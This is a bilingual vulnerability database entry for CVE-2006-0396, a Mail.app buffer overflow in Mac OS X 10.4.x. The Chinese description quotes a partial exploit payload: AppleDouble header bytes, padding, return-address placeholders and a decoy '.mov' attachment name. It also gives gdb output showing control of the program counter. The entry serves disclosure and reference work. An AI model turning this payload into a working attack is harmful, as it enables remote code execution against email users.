CVE-2006-0396 (CNNVD-200603-268)

MEDIUM 有利用代码
中文标题:
Apple Mac OS X邮件消息附件远程缓冲区溢出漏洞
英文标题:
Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-...
CVSS分数: 5.1
发布时间: 2006-03-14 11:00:00
漏洞类型: 授权问题
状态: PUBLISHED
数据质量分数: 0.30
数据版本: v4
漏洞描述
中文描述:

Apple Mac OS X是苹果家族电脑所使用的操作系统。 Apple Mac OS X的2006-001安全更新存在缓冲区溢出漏洞,攻击者可能利用此漏洞在机器上执行任意指令。 在安装Apple的2006-001安全更新后,Mail.app中存在缓冲区溢出漏洞。攻击者可以发送包含有AppleDouble头信息的特制MIME封装Macintosh文件来触发这个漏洞。例如: "\x00\x05\x16\x07". # AppleDouble Magic Number "\x00\x02\x00\x00". # Version 2 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler "\x00\x03\x00\x00". # Number of entries (3) "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info' "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10 "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name' "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48 "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245 "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d "\x05\x3a\x00\x00". # Length of Resource fork is 0x053a "\x00\x00\x00\x00". # <null> filler "\x00\x00\x00\x00". # <null> filler "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above. ... 如果Mail.app收件箱中收到了有上述首部的消息的话,用户就只能看到Real Name项所提供的名称的前11个字符,在这个例子中是"AAAAAAAAAAA...mov"。其他例子还可能包括"SuperTastey...mov"或"NakedChicks...mov"等。 如果双击了附件文件,就会导致以下dump: Date/Time: 2006-03-04 10:35:32.472 -0500 OS Version: 10.4.5 (Build 8H14) Report Version: 4 Command: Mail Path: /Applications/Mail.app/Contents/MacOS/Mail Parent: WindowServer [64] Version: 2.0.7 (746.2) Build Version: 1 Project Name: MailViewer Source Version: 7460200 PID: 271 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140 在gdb可以看到有几处溢出: (gdb) bt #0 0x41424344 in ?? () Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313131 Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 #1 0x41424344 in ?? () Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313131 warning: Previous frame identical to this frame (corrupt stack?) Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313139 这样就控制了r0、pc、lr和一半的r31。 (gdb) i r $r0 $pc $lr $r31 r0 0x41424344 1094861636 pc 0x41424344 1094861636 lr 0x41424344 1094861636 r31 0x18b3030 25899056 成功利用这个漏洞的攻击者可以远程执行任意指令。

英文描述:

Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment.

CWE类型:
(暂无数据)
标签:
remote osx Kevin Finisterre OSVDB-23872
受影响产品
厂商 产品 版本 版本范围 平台 CPE
apple mac_os_x 10.4 - - cpe:2.3:o:apple:mac_os_x:10.4:*:*:*:*:*:*:*
apple mac_os_x 10.4.1 - - cpe:2.3:o:apple:mac_os_x:10.4.1:*:*:*:*:*:*:*
apple mac_os_x 10.4.2 - - cpe:2.3:o:apple:mac_os_x:10.4.2:*:*:*:*:*:*:*
apple mac_os_x 10.4.3 - - cpe:2.3:o:apple:mac_os_x:10.4.3:*:*:*:*:*:*:*
apple mac_os_x 10.4.4 - - cpe:2.3:o:apple:mac_os_x:10.4.4:*:*:*:*:*:*:*
apple mac_os_x 10.4.5 - - cpe:2.3:o:apple:mac_os_x:10.4.5:*:*:*:*:*:*:*
apple mac_os_x_server 10.4 - - cpe:2.3:o:apple:mac_os_x_server:10.4:*:*:*:*:*:*:*
apple mac_os_x_server 10.4.1 - - cpe:2.3:o:apple:mac_os_x_server:10.4.1:*:*:*:*:*:*:*
apple mac_os_x_server 10.4.2 - - cpe:2.3:o:apple:mac_os_x_server:10.4.2:*:*:*:*:*:*:*
apple mac_os_x_server 10.4.3 - - cpe:2.3:o:apple:mac_os_x_server:10.4.3:*:*:*:*:*:*:*
apple mac_os_x_server 10.4.4 - - cpe:2.3:o:apple:mac_os_x_server:10.4.4:*:*:*:*:*:*:*
apple mac_os_x_server 10.4.5 - - cpe:2.3:o:apple:mac_os_x_server:10.4.5:*:*:*:*:*:*:*
解决方案
中文解决方案:
(暂无数据)
英文解决方案:
(暂无数据)
临时解决方案:
(暂无数据)
参考链接
17081 vdb-entry
cve.org
访问
23872 vdb-entry
cve.org
访问
ADV-2006-0949 vdb-entry
cve.org
访问
1015762 vdb-entry
cve.org
访问
VU#980084 third-party-advisory
cve.org
访问
macosx-mail-attachment-bo(25209) vdb-entry
cve.org
访问
19129 third-party-advisory
cve.org
访问
无标题 x_refsource_MISC
cve.org
访问
APPLE-SA-2006-03-13 vendor-advisory
cve.org
访问
无标题 x_refsource_CONFIRM
cve.org
访问
20060314 DMA[2006-0313a] - 'Apple OSX Mail.app RFC1740 Real Name Buffer Overflow' mailing-list
cve.org
访问
ExploitDB EDB-1583 EXPLOIT
exploitdb
访问
Download Exploit EDB-1583 EXPLOIT
exploitdb
访问
CVE Reference: CVE-2006-0396 ADVISORY
cve.org
访问
CVSS评分详情
5.1
MEDIUM
CVSS向量: AV:N/AC:H/Au:N/C:P/I:P/A:P
CVSS版本: 2.0
机密性
PARTIAL
完整性
PARTIAL
可用性
PARTIAL
时间信息
发布时间:
2006-03-14 11:00:00
修改时间:
2024-08-07 16:34:14
创建时间:
2025-11-11 15:32:31
更新时间:
2025-11-11 16:10:08
利用信息
此漏洞有可利用代码!
利用代码数量: 1
利用来源:
未知
数据源详情
数据源 记录ID 版本 提取时间
CVE cve_CVE-2006-0396 2025-11-11 15:17:39 2025-11-11 07:32:31
NVD nvd_CVE-2006-0396 2025-11-11 14:51:48 2025-11-11 07:41:17
CNNVD cnnvd_CNNVD-200603-268 2025-11-11 15:08:50 2025-11-11 07:49:05
EXPLOITDB exploitdb_EDB-1583 2025-11-11 15:05:29 2025-11-11 08:10:08
版本与语言
当前版本: v4
主要语言: EN
支持语言:
EN ZH
其他标识符:
:
:
安全公告
暂无安全公告信息
变更历史
v4 EXPLOITDB
2025-11-11 16:10:08
references_count: 11 → 14; tags_count: 0 → 4; data_sources: ['cnnvd', 'cve', 'nvd'] → ['cnnvd', 'cve', 'exploitdb', 'nvd']
查看详细变更
  • references_count: 11 -> 14
  • tags_count: 0 -> 4
  • data_sources: ['cnnvd', 'cve', 'nvd'] -> ['cnnvd', 'cve', 'exploitdb', 'nvd']
v3 CNNVD
2025-11-11 15:49:05
vulnerability_type: 未提取 → 授权问题; cnnvd_id: 未提取 → CNNVD-200603-268; data_sources: ['cve', 'nvd'] → ['cnnvd', 'cve', 'nvd']
查看详细变更
  • vulnerability_type: 未提取 -> 授权问题
  • cnnvd_id: 未提取 -> CNNVD-200603-268
  • data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
v2 NVD
2025-11-11 15:41:17
cvss_score: 未提取 → 5.1; cvss_vector: NOT_EXTRACTED → AV:N/AC:H/Au:N/C:P/I:P/A:P; cvss_version: NOT_EXTRACTED → 2.0; affected_products_count: 0 → 12; data_sources: ['cve'] → ['cve', 'nvd']
查看详细变更
  • cvss_score: 未提取 -> 5.1
  • cvss_vector: NOT_EXTRACTED -> AV:N/AC:H/Au:N/C:P/I:P/A:P
  • cvss_version: NOT_EXTRACTED -> 2.0
  • affected_products_count: 0 -> 12
  • data_sources: ['cve'] -> ['cve', 'nvd']